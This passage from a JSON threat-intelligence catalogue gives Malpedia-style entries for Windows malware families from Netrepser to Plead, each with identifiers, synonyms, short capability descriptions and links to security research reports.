"NETEAGLE" }, { "description": "", 
"meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger", "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/" ], "synonyms": [], "type": [] }, "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333", "value": "Netrepser" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat", "http://www.netsupportmanager.com/index.asp", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" ], "synonyms": [], "type": [] }, "uuid": "42562c47-08e1-46bc-962c-28d1831d092b", "value": "NetSupportManager RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler", "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf" ], "synonyms": [ "TravNet" ], "type": [] }, "uuid": "3a26ee44-3224-48f3-aefb-3978c972d928", "value": "NetTraveler" }, { "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. 
The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", "https://www.circl.lu/pub/tr-23/" ], "synonyms": [ "Recam" ], "type": [] }, "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740", "value": "NetWire RC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", "https://www.ncsc.gov.uk/alerts/turla-group-malware" ], "synonyms": [], "type": [] }, "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9", "value": "Neuron" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/", "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", "http://securitykitten.github.io/an-evening-with-n3utrino/", "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex" ], "synonyms": [ "Kasidet" ], 
"type": [] }, "uuid": "3760920e-4d1a-40d8-9e60-508079499076", "value": "Neutrino" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos", "https://securelist.com/neutrino-modification-for-pos-terminals/78839/", "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" ], "synonyms": [ "Jimmy" ], "type": [] }, "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", "value": "Neutrino POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations" ], "synonyms": [], "type": [] }, "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", "value": "NewCore RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", "https://asert.arbornetworks.com/lets-talk-about-newposthings/", "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/" ], "synonyms": [], "type": [] }, "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411", "value": "NewPosThings" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c", "value": "NewsReels" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" ], "synonyms": [ "CT" ], "type": [] }, "uuid": "ec50a75e-81f0-48b3-b1df-215eac646421", "value": "NewCT" }, { "description": 
"", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot", "https://twitter.com/benkow_/status/789006720668405760" ], "synonyms": [], "type": [] }, "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697", "value": "Nexster Bot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexus_logger", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/", "https://twitter.com/PhysicalDrive0/status/842853292124360706" ], "synonyms": [], "type": [] }, "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51", "value": "NexusLogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb", "https://research.checkpoint.com/ramnits-network-proxy-servers/" ], "synonyms": [], "type": [] }, "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", "value": "Ngioweb" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove", "https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html" ], "synonyms": [], "type": [] }, "uuid": "1bdd56fe-beca-4652-af39-87b5e45ae130", "value": "nitlove" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/" ], "synonyms": [], "type": [] }, "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", "value": "Nitol" }, { "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. 
Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services" ], "synonyms": [ "Bladabindi" ], "type": [] }, "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b", "value": "NjRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer", "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap" ], "synonyms": [], "type": [] }, "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a", "value": "Nocturnal Stealer" }, { "description": "Nokki is a RAT-type malware which is believed to have evolved from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian- and Cambodian-speaking individuals or organizations. 
Researchers discovered a tie to the threat actor group known as Reaper also known as APT37.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" ], "synonyms": [], "type": [] }, "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124", "value": "Nokki" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor" ], "synonyms": [], "type": [] }, "uuid": "6207668d-af17-44a6-97a2-e1b448264529", "value": "Nozelesn (Decryptor)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom", "https://twitter.com/malwrhunterteam/status/910952333084971008", "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin", "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/" ], "synonyms": [], "type": [] }, "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", "value": "nRansom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", "https://www.cert.pl/en/news/single/nymaim-revisited/", "https://bitbucket.org/daniel_plohmann/idapatchwork" ], "synonyms": [ "nymain" ], "type": [] }, "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937", "value": "Nymaim" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2", "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/" ], "synonyms": [], "type": [] }, "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", 
"value": "Nymaim2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt", "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf" ], "synonyms": [], "type": [] }, "uuid": "01cef4e7-a8a8-4b42-b509-f91c5d415354", "value": "Oceansalt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.octopus", "https://securelist.com/octopus-infested-seas-of-central-asia/88200/" ], "synonyms": [], "type": [] }, "uuid": "777b76f9-5390-4899-b201-ebaa8a329c96", "value": "Octopus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob" ], "synonyms": [], "type": [] }, "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2", "value": "OddJob" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], "type": [] }, "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", "value": "Odinaff" }, { "description": "According to FireEye, OLDBAIT is a credential stealer that has been observed to be used by APT28.\r\nIt targets Internet Explorer, Mozilla Firefox, Eudora, The Bat! (an email client by a Moldovan company), and Becky! (an email client made by a Japanese company). 
It can use either HTTP or SMTP to exfiltrate data.\r\nIn some places it is mistakenly named \"Sasfis\", which, however, seems to be a completely different and unrelated malware family.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait", "https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "https://www.secjuice.com/fancy-bear-review/" ], "synonyms": [ "Sasfis" ], "type": [] }, "uuid": "b79a6b61-f122-4823-a4ab-bbab89fcaf75", "value": "OLDBAIT" }, { "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", "https://securelist.com/the-devils-in-the-rich-header/84348/", "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/", "https://securelist.com/olympic-destroyer-is-still-alive/86169/", "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" ], "synonyms": [], "type": [] }, "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", "value": "Olympic Destroyer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onekeylocker", "https://twitter.com/malwrhunterteam/status/1001461507513880576" ], "synonyms": [], "type": [] }, "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", "value": "OneKeyLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" 
], "synonyms": [], "type": [] }, "uuid": "82733125-da67-44ff-b2ac-b16226088211", "value": "ONHAT" }, { "description": "OnionDuke is a new, sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network, and appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", "https://www.f-secure.com/weblog/archives/00002764.html", "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html" ], "synonyms": [], "type": [] }, "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", "value": "OnionDuke" }, { "description": "A spambot that has been observed being used for spreading Ursnif, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" ], "synonyms": [ "Onliner", "SBot" ], "type": [] }, "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", "value": "OnlinerSpambot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/" ], "synonyms": [], "type": [] }, "uuid": "d07c3def-91af-4d9b-bdf7-62c9e0b44968", "value": "OopsIE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki", "https://forum.malekal.com/viewtopic.php?t=21806", "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", 
"http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html" ], "synonyms": [], "type": [] }, "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", "value": "Opachki" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" ], "synonyms": [], "type": [] }, "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", "value": "OpGhoul" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" ], "synonyms": [], "type": [] }, "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", "value": "OpBlockBuster" }, { "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" ], "synonyms": [], "type": [] }, "uuid": "08103f1c-f83d-4037-a1ae-109b06f79226", "value": "OrcaRAT" }, { "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. 
In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", "https://orcustechnologies.com/" ], "synonyms": [], "type": [] }, "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", "value": "Orcus RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/", "https://www.gdata.de/blog/2017/11/30151-ordinypt" ], "synonyms": [], "type": [] }, "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", "value": "Ordinypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat", "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/", "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking" ], "synonyms": [], "type": [] }, "uuid": "842687f5-91bc-4719-ac3f-4166ae02e0cd", "value": "Overlay RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer", "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses" ], "synonyms": [], "type": [] }, "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375", "value": "OvidiyStealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" ], "synonyms": [ "luckyowa" ], "type": [] }, "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", 
"value": "owaauth" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt", "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/", "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/" ], "synonyms": [], "type": [] }, "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", "value": "PadCrypt" }, { "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin", "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" ], "synonyms": [], "type": [] }, "uuid": "c6728a76-f4d9-4c49-a3aa-be895df13a35", "value": "paladin" }, { "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. 
It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", "https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/", "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", "https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market", "https://www.spamhaus.org/news/article/771/", "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", "https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks", "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" ], "synonyms": [ "ZeusPanda" ], "type": [] }, "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", "value": "PandaBanker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http", "https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks" ], "synonyms": [], "type": [] }, "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", "value": 
"parasite_http" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" ], "synonyms": [], "type": [] }, "uuid": "a2fd9b8a-826d-4df5-9a29-d61a8456d086", "value": "Penco" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" ], "synonyms": [], "type": [] }, "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", "value": "PetrWrap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/", "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", "value": "Petya" }, { "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift", "https://community.fireeye.com/external/1093" ], "synonyms": [ "ReRol" ], "type": [] }, "uuid": "add29684-94b7-4c75-a43b-d039c4b76158", "value": "pgift" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor", "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf" ], "synonyms": [], "type": [] }, "uuid": 
"3a77d0d4-6fb1-4092-9fe3-bf1f51a6677c", "value": "PhanDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/", "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/" ], "synonyms": [], "type": [] }, "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", "value": "Philadephia Ransom" }, { "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", "https://www.johannesbader.ch/2016/02/phorpiex/", "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/", "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows" ], "synonyms": [ "Trik" ], "type": [] }, "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", "value": "Phorpiex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat", "https://www.snort.org/rule_docs/1-26941" ], "synonyms": [], "type": [] }, "uuid": "ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5", "value": "pipcreat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", 
"https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" ], "synonyms": [], "type": [] }, "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", "value": "pirpi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" ], "synonyms": [], "type": [] }, "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", "value": "Pitou" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat", "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/" ], "synonyms": [], "type": [] }, "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", "value": "PittyTiger RAT" }, { "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). 
In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", "http://blog.kleissner.org/?p=788", "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" ], "synonyms": [ "Bublik", "Pykbot", "TBag" ], "type": [] }, "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", "value": "Pkybot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" ], "synonyms": [], "type": [] }, "uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876", "value": "PLAINTEE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork", "https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html" ], "synonyms": [], "type": [] }, "uuid": "5e1f467b-f81e-487c-a911-ab63ae7e9b86", "value": "playwork" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", "http://www.freebuf.com/column/159865.html", "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html", "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/", "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf" ], "synonyms": [ "TSCookie" ], "type": [] }, "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", 
